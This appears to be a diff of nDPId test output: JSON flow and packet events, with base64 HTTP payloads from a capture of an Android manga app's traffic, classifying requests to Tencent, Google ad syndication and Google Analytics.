CcgOiAnY2xpY2tzdWNjZXNzJ30pXCIgPiIpO2RvY3VtZW50LndyaXRlbG4oIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0Jz4iKTtkb2N1bWVudC53cml0ZWxuKCJnb29nbGVfYWRfY2xpZW50ID0gJ2NhLXB1Yi00NDAxNTQ3MTc4Mjc5NTA1JzsiKTtkb2N1bWVudC53cml0ZWxuKCIvKiBha2VtYW5nYS5jb21fQUtfMzIweDUwXzIgKi8iKTtkb2N1bWVudC53cml0ZWxuKCJnb29nbGVfYWRfc2xvdCA9ICdha2VtYW5nYS5jb21fQUtfMzIweDUwXzInOyIpO2RvY3VtZW50LndyaXRlbG4oImdvb2dsZV9hZF93aWR0aCA9IDMyMDsiKTtkb2N1bWVudC53cml0ZWxuKCJnb29nbGVfYWRfaGVpZ2h0ID0gNTA7Iik7ZG9jdW1lbnQud3JpdGVsbigiPFwvc2NyaXB0PiIpO2RvY3VtZW50LndyaXRlbG4oIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9Jy8vcGFnZWFkMi5nb29nbGVzeW5kaWNhdGlvbi5jb20vcGFnZWFkL3Nob3dfYWRzLmpzJz4iKTtkb2N1bWVudC53cml0ZWxuKCI8XC9zY3JpcHQ+Iik7ZG9jdW1lbnQud3JpdGVsbigiPC9kaXY+Iik7dmFyIGhhdmVTY2lycHQxPWhhdmVTY2lycHQoKTtjb25zb2xlLmxvZygiZ29vZ2xlQWRzOiAiK2hhdmVTY2lycHQxKTtpZighaGF2ZVNjaXJwdDEpe2RvY3VtZW50LndyaXRlbG4oIjwhLS0gR2xvYmFsIHNpdGUgdGFnIChndGFnLmpzKSAtIEdvb2dsZSBBbmFseXRpY3MgLS0+Iik7ZG9jdW1lbnQud3JpdGVsbigiPHNjcmlwdCBhc3luYyBzcmM9J2h0dHBzOi8vd3d3Lmdvb2dsZXRhZ21hbmFnZXIuY29tL2d0YWcvanM\/aWQ9VUEtMTU0NzU3OTI5LTU3Jz48XC9zY3JpcHQ+Iik7ZG9jdW1lbnQud3JpdGVsbigiPHNjcmlwdD4iKTtkb2N1bWVudC53cml0ZWxuKCIgIHdpbmRvdy5kYXRhTGF5ZXIgPSB3aW5kb3cuZGF0YUxheWVyIHx8IFtdOyIpO2RvY3VtZW50LndyaXRlbG4oIiAgZnVuY3Rpb24gZ3RhZygpe2RhdGFMYXllci5wdXNoKGFyZ3VtZW50cyk7fSIpO2RvY3VtZW50LndyaXRlbG4oIiAgZ3RhZygnanMnLCBuZXcgRGF0ZSgpKTsiKTtkb2N1bWVudC53cml0ZWxuKCIiKTtkb2N1bWVudC53cml0ZWxuKCIgIGd0YWcoJ2NvbmZpZycsICdVQS0xNTQ3NTc5"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1714,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142293,"flow_last_seen":1654385142293,"flow_idle_time":7580000,"flow_min_l4_payload_len":517,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1654385142293,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.28.164.143","src_port":51888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1714,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1654385142293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1654385142293,"pkt":"tKXvZygQnLbQ0+MzCABFAAItm2FAAEAGvpfAqAJ+dxykj8qwAFA1Ocr3U6+amlAYAfbg8QAAR0VUIC9xem9uZS9vcGVuYXBpL3FjLTEuMC4xLmpzIEhUVFAvMS4xDQpIb3N0OiBxem9uZXN0eWxlLmd0aW1nLmNuDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpJbnRlcnZlbnRpb246IDxodHRwczovL3d3dy5jaHJvbWVzdGF0dXMuY29tL2ZlYXR1cmUvNTcxODU0Nzk0Njc5OTEwND47IGxldmVsPSJ3YXJuaW5nIg0KQWNjZXB0OiAqLyoNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1714,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142293,"flow_last_seen":1654385142293,"flow_idle_time":7580000,"flow_min_l4_payload_len":517,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1654385142293,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.28.164.143","src_port":51888,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Tencent","breed":"Acceptable","category":"SocialNetwork"},"http": {"hostname":"qzonestyle.gtimg.cn","url":"qzonestyle.gtimg.cn\/qzone\/openapi\/qc-1.0.1.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1714,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142293,"flow_last_seen":1654385142293,"flow_idle_time":7580000,"flow_min_l4_payload_len":517,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1654385142293,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.28.164.143","src_port":51888,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Tencent","breed":"Acceptable","category":"SocialNetwork"},"http": {"hostname":"qzonestyle.gtimg.cn","url":"qzonestyle.gtimg.cn\/qzone\/openapi\/qc-1.0.1.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1725,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142780,"flow_last_seen":1654385142780,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1654385142780,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1725,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1654385142780,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1654385142780,"pkt":"tKXvZygQnLbQ0+MzCABFAAI8ibZAAEAGosLAqAJ+jvq6IpXSAFAyVi4yuWM9GIAYAfYOcgAAAQEICmpGcc7084qxR0VUIC9wYWdlYWQvc2hvd19hZHMuanMgSFRUUC8xLjENCkhvc3Q6IHBhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpJbnRlcnZlbnRpb246IDxodHRwczovL3d3dy5jaHJvbWVzdGF0dXMuY29tL2ZlYXR1cmUvNTcxODU0Nzk0Njc5OTEwND47IGxldmVsPSJ3YXJuaW5nIg0KQWNjZXB0OiAqLyoNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -00986{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1725,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142780,"flow_last_seen":1654385142780,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1654385142780,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"pagead2.googlesyndication.com","url":"pagead2.googlesyndication.com\/pagead\/show_ads.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00986{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1725,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142780,"flow_last_seen":1654385142780,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1654385142780,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"pagead2.googlesyndication.com","url":"pagead2.googlesyndication.com\/pagead\/show_ads.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 02406{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1726,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1654385142822,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1654385142822,"pkt":"nLbQ0+MztKXvZygQCABFAAW++zYAADsGcsCO+roiwKgCfgBQldK5Y27yMlYwOoAYAQVIgQAAAQEICvTzitlqRnHO54B5x8bkMcj5rKNoQVor\/BQm3SPhmDDpDadH0sdUWEzHsJJG991J7GNcFmCfxsiCjLv8IWZo8ULPdOfCMeRMHHcaL4h1aKboaPInsYMSW5QQo\/JCypuKRdiaRrzY2sbGM\/MaXYMUvlY4IMPTWRAEu7PZrqdtp71d2OBq619OgHIbAeKGBf4Bk3Id+7\/Im81abelC9otiLtO5YiawFAcj5R83pbWUcSiA76rl5Zm5g+uGECfDCS0WsSYMIje33Kz7B\/CQHCjw+nh4lksNr3TtgeW4\/7JajIFAnfl17iI5bMpgNpVCgF9JYXCeHhfCCyiGI\/A3u+npcQq4MpT1eNV1\/saxKMf5Qld4T4rFFSIEwfgCG6P2ha33lVMWBaSFxO\/Mz+reiumYzQALP+eugpm6Q068chVxjvG91RjkLubAMoQDS\/mM4KwKspbzcHmHS8I3JKFhcges1eYj\/zbOWRn\/zLtgiQYZGgjfr8jKeNbuiqxLnvV9AR7EGSgXQt6gokwf+DutNqkLpb2FuyF5RXWlXYorjBev0MFJGfrmGtJd0nmEt8TAsc6HgqosNCWIgBZ\/EIx94x7v5p1LZ37xY5yDfD7teu0ZnLVzreCO3cRT6kfODUmHBwAbkYP39RCb6OD9O8RxxhjjnTrNrfxSTwe\/9Ap\/jCq3bGHW9OQ8Gm5fmTRUVwTYDyvfTZbEUP\/xOjLeI963wruwl+uBpHGIGjekHuK8l0SLl0g6pAb4F+iQWhtJFEsIVUiT+yWC6SNbe7EQQW4hgL7iTEmA0hdpq08vOQHZVq3u6M\/V+efq\/HNQ1sIp5t5lAUlbZrMHcijjYEukGH\/U1y1\/R9E10r2UGy1kBD6G7ldf3OBf3EDOMPJ3eWBdLh3BKN08SgKpcwBGu466yzavc4caXSXxKBb1cwUyYZLjMYcjDi09P3XFJ0SsXpzC75HdI3sX+AqtSARtclGx0X+hBBJhsyP41pofAbHoV40IDXhlkAqu2Xvp971SqecErV5bCH\/65Z7X9UlSrUeC\/VajwtN\/Mh2OP5AWY\/KrPPEpbXBTrhGP0\/drXl9b1ZRKfRkpIsBIEQOUVOEJSRKrx5tv9cs8CLA7IDFWlQPElS8mbTe\/FO4uBUzpai\/4e6NjNEkD\/x4ZgoFXLg94l\/agS4O2twbkzdeIG7LuYbfwHO76ewTIlFAsrsEvBrnz9wTTNN\/TnzpUn8JQ1\/dtrIKxXa74vBeLh9AgfuxeiMxuaBTfIvvK5V+5AaCmLu378MinCP1sJLxucnjd5DsEaHLL3ecT8g2W\/QHKN26grKg3503SO2\/2OxCu\/F1Q5f3Ice+Y\/x0VdO51gA8bbfeGHjbb3hWyAHeoW70q+XcMrdEd7zrg79b6uuXC73UAFURSwyrdBEIN+jX2rzjIfyW+4pvf+uZSH7\/Gc2MTbvFBbbX9b16PX1pRGaInNqfGLtHsUG8B3BtmqQeBlhpWHPYRpVnuOJzeNZgLCARxEVRyaWKKRTH2+XLDXc12oMveqHL3C+SNepipqTSMcGdGzahhXQ+6QOkPgJRGSQjkWV4Ihw5zcw7g5EwAxblTAQnq5qbS8j42+Sd9fHqM7rDAaAi435TSllIRWgNcggISMZTiMSn2Xq4iffhytWQiEe38ThBxbwfdFoJzj+0YwbO5hgM40IsBqTiUXYLH1oBFcUKfLbjQ2EIyfrFeqTy9WHdaf1+sN9pPGxdRyW42KrOLgfPUuaivc68Az\/QdWL8YFJ6SM8LAMjT6K72yfsZLGjwMPCc9x8WNKfLmVin651eeKG0Byt5g4BaGw1+4KUXMDq\/IbxY5Z52DnCKBtwYfZtEkuOdMA4d5p8DNe3HW0cb5kRtcmr+82eVnLKJN8C7lbnah\/f\/T\/hnL61q0OUO8Mqo="} 04309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1727,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1654385142845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2902,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2902,"pkt_l4_len":2868,"thread_ts_msec":1654385142845,"pkt":"nLbQ0+MztKXvZygQCABFAAtI+z0AADsGbS+O+roiwKgCfgBQldK5Y3R8MlYwOoAYAQUXfgAAAQEICvTzivJqRnH4pI5HyS0AYhnjQ\/uM5bjVvdjTZUjnqR0eArR6Be4a1wlGx7sAYKbldp5x+4IB7EuNMmGKaDrhBGhnYSaYzZrRF42BrogKrXtwaM6IhhfzBp54pTv5mxi1Vq9j6Sj+JkZH8edt9wgeNtxNd6vtvoXHbfcZD7n0Lvbexf7DJ9aouvusseG+Yo1N94A1tjgH\/j7238WVfeYe08Mr5p7QwwEzNKvL68eaaywX0ixejNW1VvuVX0granODrtiMbh8LsjjmjjFVIprX1CWWhg7qrxxkUBgrmJQ6j6MULhjinsYyyhrGtKm5PH41RvFS4mIYIjSJl1pQEMXQD4LVF1Us08JQLyJlo6NiK6uQyqLIR1SJIJVAyRv55Gr+3qrT3MgoOM8R4tWGjOoZitbfxw3h8YUG3RtUSljx8O8cxw2RubmceaIyt8zMuZLPiDA6gU83k1EwKG6JrCxDEWtxNoD0rV1mH\/NYtEoxq65nBCrYnPpNY9HX1mJPWi7FmLllQgRRwrU6JTEf4xo9g2ealbex03yGkYNE+LWlCYLxM59i7W2bdbapzuJkPNq4nBhmTIwZ7HM7B8AIU9jlF\/7CDW5rCNS4yU\/VtT8x3t7NI0tF8sKQQPT9mYSR+KXo43OVsiNSagq+CO8UiwcxhfQh6l5ohfHWIeEnJSpVG4u9onh2uW7JILC12lLhFWXnc8N44Sw27UTxst41QNTwV+xYU892vhrHfSIcd65w3CfAZ5tGKIzPy9Wwwuc4p8r\/srrxb9T4F9X4N2gccOZ3+Km5ddhGhDm1mpqf6ZUTySUzhPOVbgDchl65OalowWeIcCWnGmDka3MOWGLg1gXmPHiEOTcMIXI34AWOKdKmQzVIfGbcoKyOvVbbJR0l8+9sZoaQYfKS4LWI39QMxb41wsq3uaszHXj3xcXNrtl+\/NhQEvyYvCjGTlpx5VvljLV9\/BVzo0K+uomDOj70hNX+XJhV4UdqltzbraCdMzEMEyU2zJnkkiLZWU5C3bJUE3\/8cHZuucEwum8ErlY4k4XujuSv8srnYT9bUi0vK6LnxjV43BXl6\/H7N0CLnnLtPhDqw1E8sEUPKHoeWqyjeCpvvRIlK5X+YdIIpPDOoDprBxtaWhdISZ8UYQtTjCgxRJ4nuZhaXFq4EvaEQMxjuWu5AyF6FBXgFXcJc2RYo3xpIY5DUU2Glo2X9r+zWBihZiX2a2QEH\/CRBXJYjlerovJNyUabAltDEgYkRVE13ns4vMaLiVMYENSc8LsQMS3EO0sbQkNFVeylEgATyEDl3O7iZCW6SRIKY5bkUFMnydnSU3TEWi6wdJovQbEI67kSl\/kSFBV2M1eiu6KNrVyJXr4ExYjdzpXoL48Kx9On8fRNCHq\/wk3xDa9SywcRHKz4an70wxUl8qMfre7XKJFoPUmQLiZy+Coh1G4g9fHqtZrQWo3zazVdXfaayk7V9yYJD9gEGXSe3CTyPDFPrtvV3b6lZm7N6cTbOVnnDDAj1NsfjsdxD20IH5\/ken6S7wyEgYjnNpGI9CuGiduUQbS+wVEAs5Q78+6TR4PCYlMRckeNSKIVJnUKocQ4kbaOUQYzQl8BTF9kOy9r68JLVvPOST4gHhffAiAAtOBH+3gZMN4FH\/gAtbA9YA8BgF\/y3BhNtlwgRlIKeIsnCBS8w456wH4Ui3iMVy7dXQ5YivxPZrMN\/oMUaUI2m2h40Y81vuqome5U3tsYJjPF32Lxjd2hWUf7QDjUmRQupWj+XzWMMCisX2WSZsnUVO3uqSFzv47KUHJHOKRxAiOAPRsT5MMpTJH+NnAKgCw\/Re6khvgvkssb+V8xcOgzLLE0ZhT45BwMEmk\/fYrN1lyte5Y4+3VkCz8nT5SquzrCNCVsu2hnYUDdeyNARsgsLtMJyWIx75RiB\/qaUijgcSBVboGY5puilf1EHUvSCiv1bdZ6H2PkdfQBkg8n4kHYR75K\/PW\/MeyeDK9hJXCAx6bF44GYiwUKXJG+xCTVgEIURHE9l1HXGRu5jA2dsZ3L2KYM4VBm0tcGFX2oyRllBMwVoI\/18oO4BCXPPSBPs7HY74\/8TpKFTptFVYeJodt8pLc4v6+TBQ089vhVIrqMa6VMO4Sia8Jx2hlgM5ISrkxWvjTW69evDs\/O3nErIzUVRA2S6w1qOxcdCB7meY+MN8ZO4zssh9SqjchN3NR7bx8lTuUSrzbiJIOd+koZpzOVe1+C7qYIyc20QWhoXDmLp45I9WL\/dWIbcYNjpFklD4c3SAX+W+T88NGMdlEIxXb4gloteH7H8Zh\/iDcHslxsea7pN0yH3xl4\/729D10m4zIlT4gDm4QlwCxtOavkG8C\/fUI88joGaMIzN3\/fyCdEPOcoaZnrFIYpmwZqO0q05YS2mtQ2FHoP82k7ZiPj8gR1\/EgBAaxfbdlicyE2wLGqliORq0AhMxGR14aG6i4vpaaR4lRiSKbAlGedLHQCYWgj3wfLauRj7H9Y3YNWWxudQSvb7mJs\/rcmC8jhLGvRBe36JX+\/xMfElBG9JfhYYbMr4QkhOprnZusv47xF9axxOQTMLbdWEMaasGx\/MoA880Tkakr4cMfx6PpJlSnUPn0Uo\/QQ07kDHzBsz+UhU4X+68q9d\/eEBkvstT25167EXksRCWAMdbnfRP69f0U5A51zL4KhAune3GtgTIbGA9fXTROJMfsKY54F9hUg9JvEHTjmrap1nlNfztngORvLOds8ZzOXI7FlX8qVpQzpLyy75R4C7exfoSDp0Bc6yhvv0F8ThnH2jcI2nbYzm63d4OmJ450fKvNfPp03sv6+d6Pr7y\/O4GxW+GNtX7VyUyxqsz+8n0BUcPfRpAIKdaAGPk+wuqv2KC\/A2xSN8XIiCYsP3FbbcYFEMdL5aklTdsfrtgZtv6f4ffRPczw7UcYsknACIguIpBCRs7j8BDVe0sxCS0xX7IY8UEYmZQVoNcKwH+dIXOFRbMcIoUh28lCheGe2zTcN6cm0bCsxLCACeypCfrlWN76fyFC3Ik1sXQPH6j0u\/dtyjZ8TFkgCsel7Ll7gBRsdxrNJUjZNsRwrYxkuwkBHNKFE+cRNKo5tQN6f1fO2435RL4D3v8qXuuN+k88bjvtdPsMX\/5TPUJ51xDM0FMjnZ0CPy+fnsOTy+QVQ4vIZL\/VO1Av0qaNe4NOpeoFvZ+pl0yDOTiRKDRcpSGYMHmZqta9i6EpNjVla+iwG5vx\/WED4QcusAyARzmYGnWMQa5eoCHo4sf9M3Pd4A6wHne64x+Ix6Lgn4jHsuB\/EY9pxT8Xjl8Q9TxY8sruiye+JETjJeRAnOpDGvGrUycVVkgwbFUPnUKSPgbwAcNYveO85rx3\/U+1js\/bxQu3kn2qfmLVPFmpnndzAtNqI6ruRf2dDf93j2D3BWMsYtFzKJWMul9RJDt59wmWReksyICc7g4VNCUCEN9PiZaDUEUMU0uFy3gUgs\/CCtHIk3IEf9YfVpSRorVXn5o7td2xlFGcCkSSIltOyFWnpMvvfahuAiHAufap6\/gf7E0bLNptBztBoGNDiB\/vrQiHVrgNEBKwX+iKsEDt8sL89XpFXu1z40uel7vAvcE6tG7vDjnvHcfS1cfXeiJZGXeFlP24L6wNoPZ5L10\/cxSggQOUkzAQ6T14+bneL6ncywsTDpJK5N6jtUHJFH138c5L1boyertj9LPaW3atN\/wBzGPCat5x2PHQt8IYcId7G8FTZZTYKh61w2B\/14mls+f6uafTFovszDO\/WhNlyGncxCi4v0TRfeJ4Z044l5iS+NA=="} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1727,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385142780,"flow_last_seen":1654385142845,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":4774,"flow_avg_l4_payload_len":1591,"midstream":1,"thread_ts_msec":1654385142845,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"pagead2.googlesyndication.com","url":"pagead2.googlesyndication.com\/pagead\/show_ads.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1727,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385142780,"flow_last_seen":1654385142845,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":4774,"flow_avg_l4_payload_len":1591,"midstream":1,"thread_ts_msec":1654385142845,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"pagead2.googlesyndication.com","url":"pagead2.googlesyndication.com\/pagead\/show_ads.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1740,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385143337,"flow_last_seen":1654385143337,"flow_idle_time":7580000,"flow_min_l4_payload_len":421,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":421,"midstream":1,"thread_ts_msec":1654385143337,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.174","src_port":36732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01034{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1740,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1654385143337,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":487,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":487,"pkt_l4_len":453,"thread_ts_msec":1654385143337,"pkt":"tKXvZygQnLbQ0+MzCABFAAHZOzFAAEAG8R7AqAJ+jvq6ro98AFDBsgXgq0aUtoAYAfYOmwAAAQEICoBTPnRMQU2TR0VUIC9hbmFseXRpY3MuanMgSFRUUC8xLjENCkhvc3Q6IHd3dy5nb29nbGUtYW5hbHl0aWNzLmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiAqLyoNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1740,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385143337,"flow_last_seen":1654385143337,"flow_idle_time":7580000,"flow_min_l4_payload_len":421,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":421,"midstream":1,"thread_ts_msec":1654385143337,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.174","src_port":36732,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/analytics.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 